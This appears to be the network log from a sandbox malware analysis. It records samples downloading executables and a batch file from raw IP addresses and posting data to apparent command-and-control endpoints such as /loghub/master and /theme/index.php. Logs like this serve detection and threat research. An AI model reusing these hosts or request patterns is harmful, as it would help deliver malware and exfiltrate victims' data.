Accept: */*
Referer: http://ovthaip.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 195
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rgaey.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 205
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:19:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://77.91.68.52/fuza/3.bat

Remote address:

77.91.68.52:80

Request

GET /fuza/3.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.52

Response

HTTP/1.1 200 OK

Date: Fri, 13 Oct 2023 04:18:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 11 Oct 2023 23:08:44 GMT
ETag: "4f-60778e7a46265"
Accept-Ranges: bytes
Content-Length: 79
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

52.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.68.91.77.in-addr.arpa

IN PTR

Response

52.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://5.42.65.80/rinkas.exe

Remote address:

5.42.65.80:80

Request

GET /rinkas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 13 Oct 2023 04:19:04 GMT
Content-Type: application/octet-stream
Content-Length: 202752
Last-Modified: Thu, 12 Oct 2023 19:55:32 GMT
Connection: keep-alive
ETag: "65284f34-31800"
Accept-Ranges: bytes
GET

http://185.216.70.222/trafico.exe

Remote address:

185.216.70.222:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 185.216.70.222

Response

HTTP/1.1 200 OK

Date: Fri, 13 Oct 2023 04:19:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 12 Oct 2023 16:52:11 GMT
ETag: "6ea00-60787c2df0daa"
Accept-Ranges: bytes
Content-Length: 453120
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
DNS

222.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

222.70.216.185.in-addr.arpa

IN PTR

Response
GET

http://171.22.28.213/1.exe

Remote address:

171.22.28.213:80

Request

GET /1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 171.22.28.213

Response

HTTP/1.1 200 OK

Date: Fri, 13 Oct 2023 04:19:08 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Tue, 10 Oct 2023 14:07:59 GMT
ETag: "108400-6075d3bf04880"
Accept-Ranges: bytes
Content-Length: 1082368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

213.28.22.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

213.28.22.171.in-addr.arpa

IN PTR

Response
POST

http://5.42.92.211/loghub/master

4A92.exe

Remote address:

5.42.92.211:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=87U8Mq6fRzaSsDn8t1Zs
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 5.42.92.211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 13 Oct 2023 04:19:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

211.92.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

211.92.42.5.in-addr.arpa

IN PTR

Response

211.92.42.5.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
DNS

141.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

141.179.250.142.in-addr.arpa

IN PTR

Response

141.179.250.142.in-addr.arpa

IN PTR

ams17s10-in-f131e100net
DNS

35.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.247.240.157.in-addr.arpa

IN PTR

Response

35.247.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams2facebookcom
DNS

static.xx.fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.247.8
DNS

8.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.247.240.157.in-addr.arpa

IN PTR

Response

8.247.240.157.in-addr.arpa

IN PTR

xx-fbcdn-shv-01-ams2fbcdnnet
DNS

facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

facebook.com

IN A

Response

facebook.com

IN A

157.240.221.35
DNS

fbcdn.net

msedge.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

157.240.221.35
DNS

35.221.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.221.240.157.in-addr.arpa

IN PTR

Response

35.221.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-lhr8facebookcom
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A
DNS

fbsbx.com

msedge.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Fri, 13 Oct 2023 04:19:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

65.9.196.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.9.196.185.in-addr.arpa

IN PTR

Response
POST

http://85.209.176.171/

7C48.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 85.209.176.171
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 13 Oct 2023 09:11:49 GMT
POST

http://85.209.176.171/

7C48.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 85.209.176.171
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 13 Oct 2023 09:11:49 GMT
POST

http://85.209.176.171/

7C48.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
Host: 85.209.176.171
Content-Length: 591903
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 13 Oct 2023 09:11:49 GMT
POST

http://85.209.176.171/

7C48.exe

Remote address:

85.209.176.171:80

Request

POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
Host: 85.209.176.171
Content-Length: 591895
Expect: 100-continue
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK

Content-Length: 261
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Fri, 13 Oct 2023 09:11:49 GMT
DNS

238.70.216.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.70.216.185.in-addr.arpa

IN PTR

Response
DNS

202.28.22.171.in-addr.arpa

Remote address:

8.8.8.8:53

Request

202.28.22.171.in-addr.arpa

IN PTR

Response
DNS

171.176.209.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.176.209.85.in-addr.arpa

IN PTR

Response
DNS

learn.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

learn.microsoft.com

IN A

Response

learn.microsoft.com

IN CNAME

learn-public.trafficmanager.net

learn-public.trafficmanager.net

IN CNAME

learn.microsoft.com.edgekey.net

learn.microsoft.com.edgekey.net

IN CNAME

learn.microsoft.com.edgekey.net.globalredir.akadns.net

learn.microsoft.com.edgekey.net.globalredir.akadns.net

IN CNAME

e13636.dscb.akamaiedge.net

e13636.dscb.akamaiedge.net

IN A

104.85.2.139
GET

https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0UcUoZQAAAABN/nrBsUueTbzjfLrunKv6QlJVMzBFREdFMTAxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Fri, 13 Oct 2023 04:19:29 GMT
date: Fri, 13 Oct 2023 04:19:29 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/html
content-encoding: gzip
etag: "48oaBvq6CqqaAXsrLxLwLtJOddnmrAeL3Xs2EG6dFSk="
vary: Accept-Encoding
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Dynamic
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0UcUoZQAAAAAaH5J1DVxWSIglBPK1xya6QU1TMDRFREdFMTkwOQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 12551
cache-control: public, max-age=600
expires: Fri, 13 Oct 2023 04:29:29 GMT
date: Fri, 13 Oct 2023 04:19:29 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/edf5538c.site-ltr.css

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/styles/edf5538c.site-ltr.css HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/javascript
content-encoding: gzip
content-md5: p2plPaqhNrF9OruIDBWWBg==
last-modified: Thu, 30 Mar 2023 19:40:20 GMT
etag: 0x8DB315698C00FE5
x-ms-request-id: e54572c4-501e-0073-7f4e-67bf51000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0SLUsZAAAAAAzmaciykciRJbMlrdBtIVnQU1TMDRFREdFMTkxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
x-content-type-options: nosniff
content-length: 33794
vary: Accept-Encoding
cache-control: max-age=17757504
expires: Sun, 05 May 2024 16:57:58 GMT
date: Fri, 13 Oct 2023 04:19:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /static/third-party/adobe-target/at-js/2.9.0/at.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/css
content-length: 68081
content-encoding: gzip
etag: "0x8DBCB6479596F87"
last-modified: Thu, 12 Oct 2023 20:47:39 GMT
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20231012T204824Z-614pxkf5xt70menbevwhzgfqw800000008ag000000015ntf
accept-ranges: bytes
vary: Accept-Encoding
cache-control: public, max-age=577718
expires: Thu, 19 Oct 2023 20:48:12 GMT
date: Fri, 13 Oct 2023 04:19:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 588
content-type: application/javascript
content-encoding: gzip
last-modified: Mon, 09 Oct 2023 21:01:25 GMT
etag: "0x8DBC90AE65B8137"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0VdIlZQAAAADOjHxJn07wSp01YEDyrYVbQlJVMzBFREdFMTExNAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=411552
expires: Tue, 17 Oct 2023 22:38:46 GMT
date: Fri, 13 Oct 2023 04:19:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/fddca500.index-docs.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /_themes/docs.theme/master/en-us/_themes/scripts/fddca500.index-docs.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-length: 606746
content-type: application/javascript
content-encoding: gzip
last-modified: Fri, 13 Oct 2023 00:29:44 GMT
etag: "0x8DBCB837F98B519"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0kI8oZQAAAABIv6H71eRyRbUu75TR/w7zQlJVMzBFREdFMTAxMgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=591023
expires: Fri, 20 Oct 2023 00:29:57 GMT
date: Fri, 13 Oct 2023 04:19:34 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 301

location: /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0VsUoZQAAAADxL9UzV3u5SY5j8BQW2F9oQlJVMzBFREdFMDcxOAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 0
cache-control: no-cache, no-store
expires: Fri, 13 Oct 2023 04:19:34 GMT
date: Fri, 13 Oct 2023 04:19:34 GMT
akamai-cache-status: Miss from child, Miss from parent
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /static/third-party/MathJax/3.2.2/tex-mml-chtml.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: application/javascript
content-encoding: gzip
content-md5: LgDVHJjbszjoEFTyQOHesg==
last-modified: Wed, 20 Sep 2023 23:31:57 GMT
etag: 0x8DBBA31C829D526
x-ms-request-id: 46f6f1ff-601e-0013-232a-f2fdd8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
x-azure-ref-originshield: 0WKwVZQAAAAA3Esd26EFaSo+eaMvCT+R0QU1TMDRFREdFMTgwNgA0NGU4ZTUwNy00YmE1LTRiNzAtODcwYS0yODA4NDM4ZDZiMmI=
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0WKwVZQAAAACZkpucdi9lQogXOsGBmhSBQlJVMzBFREdFMTExMAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
x-content-type-options: nosniff
content-length: 265844
vary: Accept-Encoding
cache-control: max-age=30284472
expires: Fri, 27 Sep 2024 16:40:48 GMT
date: Fri, 13 Oct 2023 04:19:36 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET

https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png

msedge.exe

Remote address:

104.85.2.139:443

Request

GET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: image/png
content-length: 35005
etag: "0x8D8E3CB30F4C3E2"
last-modified: Wed, 10 Mar 2021 13:48:31 GMT
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 20230628T081959Z-kxtvra8dxd7c71tecefzzq90a000000001ng000000013q0b
accept-ranges: bytes
cache-control: public, max-age=466
expires: Fri, 13 Oct 2023 04:27:23 GMT
date: Fri, 13 Oct 2023 04:19:37 GMT
akamai-cache-status: Hit from child
strict-transport-security: max-age=31536000; includeSubDomains; preload
GET
